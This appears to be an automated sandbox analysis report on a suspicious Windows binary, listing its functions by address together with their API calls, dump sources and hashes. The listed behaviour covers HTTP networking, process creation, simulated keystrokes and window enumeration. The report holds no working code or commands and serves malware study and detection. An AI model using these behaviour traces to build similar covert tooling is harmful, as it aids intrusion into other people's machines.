                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B94668
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: cf8ca4653f1826595dec74ed47651c17e4a4e4597592fa5dce12d522677f2966
                                              • Instruction ID: c7d8b311f7cfc0b7370d8016466974a411a450a9a78f152c33658022478b1595
                                              • Opcode Fuzzy Hash: cf8ca4653f1826595dec74ed47651c17e4a4e4597592fa5dce12d522677f2966
                                              • Instruction Fuzzy Hash: BDA11370602212CFCB29EB14C9A5B79F7E4EF05711F5542F9E90AAB261DB30AD1ACF50
                                              Function 00BAA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnumChildWindows.USER32(?,00BAA439), ref: 00BAA377
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ChildEnumWindows
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                              • API String ID: 3555792229-1603158881
                                              • Opcode ID: dd94dac71769379cfa4e857308ec0b53b3873cf81b8797985b5142ae334c4b87
                                              • Instruction ID: 704a870bc162f1a3e23f78378d77a0c281f4499fb4bf00646a45721f7e5dcbb5
                                              • Opcode Fuzzy Hash: dd94dac71769379cfa4e857308ec0b53b3873cf81b8797985b5142ae334c4b87
                                              • Instruction Fuzzy Hash: CE91A470A08605EACF18EFA0C482BEDFBE4FF16300F548199D859A7191DF316999DBB1
                                              Function 00B52E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 00B52EAE
                                                • Part of subcall function 00B51DB3: GetClientRect.USER32(?,?), ref: 00B51DDC
                                                • Part of subcall function 00B51DB3: GetWindowRect.USER32(?,?), ref: 00B51E1D
                                                • Part of subcall function 00B51DB3: ScreenToClient.USER32(?,?), ref: 00B51E45
                                              • GetDC.USER32 ref: 00B8CD32
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B8CD45
                                              • SelectObject.GDI32(00000000,00000000), ref: 00B8CD53
                                              • SelectObject.GDI32(00000000,00000000), ref: 00B8CD68
                                              • ReleaseDC.USER32(?,00000000), ref: 00B8CD70
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B8CDFB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              • API String ID: 4009187628-3372436214
                                              • Opcode ID: 4b8a44da3c9e822ba841305f800ae0a05e554599fc9d81db5412a1362b7f290e
                                              • Instruction ID: 2b8883bc735583d9af9a3567b4e49f3482f09d609e2b949d16a0e72916b0bba5
                                              • Opcode Fuzzy Hash: 4b8a44da3c9e822ba841305f800ae0a05e554599fc9d81db5412a1362b7f290e
                                              • Instruction Fuzzy Hash: 6971BC71800205DFCF21AF64C881AAA7FF5FF49321F1482FAED595A2A6D7309845DFA0
                                              Function 00BC1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BC1A50
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BC1A7C
                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BC1ABE
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BC1AD3
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC1AE0
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BC1B10
                                              • InternetCloseHandle.WININET(00000000), ref: 00BC1B57
                                                • Part of subcall function 00BC2483: GetLastError.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC2498
                                                • Part of subcall function 00BC2483: SetEvent.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC24AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                              • String ID:
                                              • API String ID: 2603140658-3916222277
                                              • Opcode ID: ca5818c1ad9e72adf5af5915f0183d6ead090905b5d78bb96c29904a4344a4f1
                                              • Instruction ID: c95d11a47bac214aa49b822c75fd5071b4804a138c6d219a26558d816aebb41f
                                              • Opcode Fuzzy Hash: ca5818c1ad9e72adf5af5915f0183d6ead090905b5d78bb96c29904a4344a4f1
                                              • Instruction Fuzzy Hash: 7F419FB1501209BFEB119F54CC85FFA7BACEF09350F00816AFA05AA142EB709E409BA0
                                              Function 00BC8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BDF910), ref: 00BC8D28
                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BDF910), ref: 00BC8D5C
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BC8ED6
                                              • SysFreeString.OLEAUT32(?), ref: 00BC8F00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                              • String ID:
                                              • API String ID: 560350794-0
                                              • Opcode ID: d1b9f1508401bb9e2732e0bcea904cafa4431250e4c12c3820decdc92a0477a7
                                              • Instruction ID: 1b38135954478dfa89f7dbd7b82b263849e5f77edceac3c78668b0f6e9b6f111
                                              • Opcode Fuzzy Hash: d1b9f1508401bb9e2732e0bcea904cafa4431250e4c12c3820decdc92a0477a7
                                              • Instruction Fuzzy Hash: 3EF12871A00209EFDB14DF94C888EAEB7B9FF45315F10849DF916AB251DB31AE45CBA0
                                              Function 00BCF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BCF6B5
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF848
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF86C
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF8AC
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF8CE
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BCFA4A
                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BCFA7C
                                              • CloseHandle.KERNEL32(?), ref: 00BCFAAB
                                              • CloseHandle.KERNEL32(?), ref: 00BCFB22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                              • String ID:
                                              • API String ID: 4090791747-0
                                              • Opcode ID: e08e07c4bb168cd0238ae25d58722667eef526224c7ff3e4771c02082de82208
                                              • Instruction ID: 5b6a4cd6958ede0fdf0b0847870ab2ea0c6cbd9f7b2918cd2d57d6026b3946ca
                                              • Opcode Fuzzy Hash: e08e07c4bb168cd0238ae25d58722667eef526224c7ff3e4771c02082de82208
                                              • Instruction Fuzzy Hash: C9E14D31604202DFCB14EF24C891B6ABBE1EF85354F1485EEF8999B2A1DB71DC45CB52
                                              Function 00B5201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B51B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B52036,?,00000000,?,?,?,?,00B516CB,00000000,?), ref: 00B51B9A
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B520D3
                                              • KillTimer.USER32(-00000001,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B5216E
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00B8BCA6
                                              • DeleteObject.GDI32(00000000), ref: 00B8BD1C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 2402799130-0
                                              • Opcode ID: 39b6ccda31976c0c26f861f6ea670dbdb7efd4f067134ee3a7b4d441a27eb0f2
                                              • Instruction ID: 3edb541e005aa92e5da77c03454b8b466efe1eb6407db80d947d56b7774dda68
                                              • Opcode Fuzzy Hash: 39b6ccda31976c0c26f861f6ea670dbdb7efd4f067134ee3a7b4d441a27eb0f2
                                              • Instruction Fuzzy Hash: 3161A131502A01DFDB35AF24D999B6AB7F1FF82312F1484E9E94257AB0C770A885DF90
                                              Function 00BB4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BB3697,?), ref: 00BB468B
                                                • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BB3697,?), ref: 00BB46A4
                                                • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00BB4D40
                                              • _wcscmp.LIBCMT ref: 00BB4D5A
                                              • MoveFileW.KERNEL32(?,?), ref: 00BB4D75
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                              • String ID:
                                              • API String ID: 793581249-0
                                              • Opcode ID: 1edf9fd5968a0c5237b56867dfe05070181edac848808b53f2913aa723191f2f
                                              • Instruction ID: 5eacda1c68ede34dcaa6b873b1120073071bd8e07c42d6fde1bad25a9b5b1fdf
                                              • Opcode Fuzzy Hash: 1edf9fd5968a0c5237b56867dfe05070181edac848808b53f2913aa723191f2f
                                              • Instruction Fuzzy Hash: 325174B20083459BC725DB64D8919EFB3ECEF84351F00496EF589D3152EF74A688C766
                                              Function 00BD8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BD86FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: 69302bfe74497a38ae4514597ceb17100955876a721836f9110ff0df9f6c41b7
                                              • Instruction ID: 2268fe482964e829e3e0c9f6799d721db4822c5dbeb53d16097b3e8fb9a84706
                                              • Opcode Fuzzy Hash: 69302bfe74497a38ae4514597ceb17100955876a721836f9110ff0df9f6c41b7
                                              • Instruction Fuzzy Hash: DF518130501205BEEB209B28CC85FADBBE5EB06722F6041D3F915D63A1EF72E980DB41
                                              Function 00B52B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B8C2F7
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B8C319
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B8C331
                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B8C34F
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B8C370
                                              • DestroyCursor.USER32(00000000), ref: 00B8C37F
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B8C39C
                                              • DestroyCursor.USER32(?), ref: 00B8C3AB
                                                • Part of subcall function 00BDA4AF: DeleteObject.GDI32(00000000), ref: 00BDA4E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                              • String ID:
                                              • API String ID: 2975913752-0
                                              • Opcode ID: 38093b45580305cbb1e887f775b2f09051f9230f9f2b705de58e8864c6948e70
                                              • Instruction ID: cc4ff804aa6763a11e5df7d8bfa93db8d13afac251427719a3d6e61d1ef52248
                                              • Opcode Fuzzy Hash: 38093b45580305cbb1e887f775b2f09051f9230f9f2b705de58e8864c6948e70
                                              • Instruction Fuzzy Hash: 98516970A01205EFDB24DF24CC85BAA7BE5FB49311F1085A9F902972E0DB70ED95DB60
                                              Function 00BA966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BAA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BAA84C
                                                • Part of subcall function 00BAA82C: GetCurrentThreadId.KERNEL32 ref: 00BAA853
                                                • Part of subcall function 00BAA82C: AttachThreadInput.USER32(00000000,?,00BA9683,?,00000001), ref: 00BAA85A
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA968E
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BA96AB
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00BA96AE
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA96B7
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00BA96D5
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BA96D8
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA96E1
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00BA96F8
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BA96FB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 0f3dca4c9efcd398462dfdf0f92ae47303a167d4061e4de699fe726b1604e95d
                                              • Instruction ID: fd71f6d52f6208bcee904fc237b9b63ec752c25990fb40a936cda6da0804f4d2
                                              • Opcode Fuzzy Hash: 0f3dca4c9efcd398462dfdf0f92ae47303a167d4061e4de699fe726b1604e95d
                                              • Instruction Fuzzy Hash: 5011CEB1914219BEFA106B649C89F7ABB6DEB4D750F100426F355AB0A0DEF25C10DAA4
                                              Function 00BA8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00BA853C,00000B00,?,?), ref: 00BA892A
                                              • RtlAllocateHeap.NTDLL(00000000,?,00BA853C), ref: 00BA8931
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BA853C,00000B00,?,?), ref: 00BA8946
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00BA853C,00000B00,?,?), ref: 00BA894E
                                              • DuplicateHandle.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA8951
                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00BA853C,00000B00,?,?), ref: 00BA8961
                                              • GetCurrentProcess.KERNEL32(00BA853C,00000000,?,00BA853C,00000B00,?,?), ref: 00BA8969
                                              • DuplicateHandle.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA896C
                                              • CreateThread.KERNEL32(00000000,00000000,00BA8992,00000000,00000000,00000000), ref: 00BA8986
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                              • String ID:
                                              • API String ID: 1422014791-0
                                              • Opcode ID: bbc97939b5e4787b1da0ab862a3f040179c28691913f54e28760f869849a6b93
                                              • Instruction ID: 9150b2fd776df510984915bac86dc0567d8fd0f3419fbd26a06be974fae8e102
                                              • Opcode Fuzzy Hash: bbc97939b5e4787b1da0ab862a3f040179c28691913f54e28760f869849a6b93
                                              • Instruction Fuzzy Hash: 8B01BBB5245309FFEB10ABA5DC4DF6B7BACEB89711F408421FA05DB1A1DA709800CB60
